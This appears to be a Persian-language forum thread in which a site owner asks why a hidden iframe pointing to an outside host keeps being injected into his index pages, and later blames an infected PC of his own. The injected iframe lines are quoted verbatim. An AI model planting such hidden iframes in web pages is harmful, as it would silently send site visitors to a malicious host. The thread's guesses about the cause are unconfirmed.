نمایش نتایج 1 تا 3 از 3

نام تاپیک: این ویروسه جدیده یا سایت طرف هک شده؟

  1. #1
    کاربر دائمی
    تاریخ عضویت
    خرداد 1384
    محل زندگی
    mashhad
    پست
    136

    این ویروسه جدیده یا سایت طرف هک شده؟

    سلام دوستان
    دیروز دوستی بمن زنگ زد گفت تو صفحه اول سایتش همه چیز پاک شده ؛ چک کردم دیدم تو شاخه www که قبلا index.html گذاشته بودم هست ولی یه فایل دیگه هم بود که نمیدونم از کجا تو این سایت اومده index.htm که تو این htm دومی فقط یه خط بود:

    <iframe avgjc='jUZIKgnO' src='http://olthart.com/imag/in.cgi?2 ' ndcll='2PeZ6gp1' width='616' height='96' style='display:none'></iframe><iframe vqiff='rORIfY68' lngse='QrauX48Q' oxmgk='6uAr6aew' pwplo='TNfzeZaA' uomgs='z5te6zrV' src='http://olthart.com/imag/in.cgi?2 ' okpbv='ul388nTf' lywwp='Ogi61Tnf' dcwvn='te1fGFDh' qhbll='hgVwaP2I' fvtts='rWlZqV0f' width='97' height='516' style='display:none'></iframe>

    بعد فایل index.html اصلی که من تو سایت گذاشته بودم رو چک کردم با کمال تعجب دیدم که یه خط اضافی اول ان بود اینطور نوشته شده:

    <iframe avgjc='jUZIKgnO' src='http://olthart.com/imag/in.cgi?2 ' ndcll='2PeZ6gp1' width='616' height='96' style='display:none'></iframe>
    <html>
    <head>

    در صورتیکه من خط بالای <html> رو من ننوشته بودم
    حال موندم چه اتفاقی افتاده ایا سایت مربوطه هک شده و بایستی username +password مربوط به ftp را change کنم یا یه ویروس تو سیستم من بوده که من تو سایت اپلود کردم
    بهر حال دیروز فایل index.html را درست کردم و خط اول اضافی را پاک کردم ولی باز امروز همان اش و همان کاسه!
    دوباره رفته یه خط به فایل index.html اضافه کرده؛ کسی تجربه این اتفاق رو داره راهنمایی کنه؟

    درضمن یادم رفت بگم که یه فایل قدیمی هم از قبل تو شاخه www گذاشته بودم بنام index2.html دیدم به اونم یه خط اضافه شده بود مثل اینه هرچی فایل اول اسمش index باشه میره یه خط اضافه میکنه!

  2. #2
    شما از هاست رایگان استفاده میکنید؟ بعضی اوقات مسئولین این نوع هاست برای ایجاد تبلیغات چنین اسکریپتهایی رو به طور خودکار به فایلهای شما اضافه میکنند.

  3. #3
    کاربر دائمی
    تاریخ عضویت
    خرداد 1384
    محل زندگی
    mashhad
    پست
    136
    نه دوست عزیز از هاست رایگان استفاده نکردم ولی فعلا ویندوز خودم را عوض کردم و هرچی فایل مشکوک از قبیل index.htm تو سایت بود پاک کردم -فعلا گوش شیطون کر مثل اینکه خبری نیست- به نظر میاد سیستم من ویروسی شده بوده و روزهای قبل که فایل اپلود میکردم (با فایرفاکس) این ویروس هم اقدام به این کارها میکرده - این ویروس که نمیدونم اسمش چیه یه فایل هم بنام KWU1K0 گذاشته بود تو روت درایو c .

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •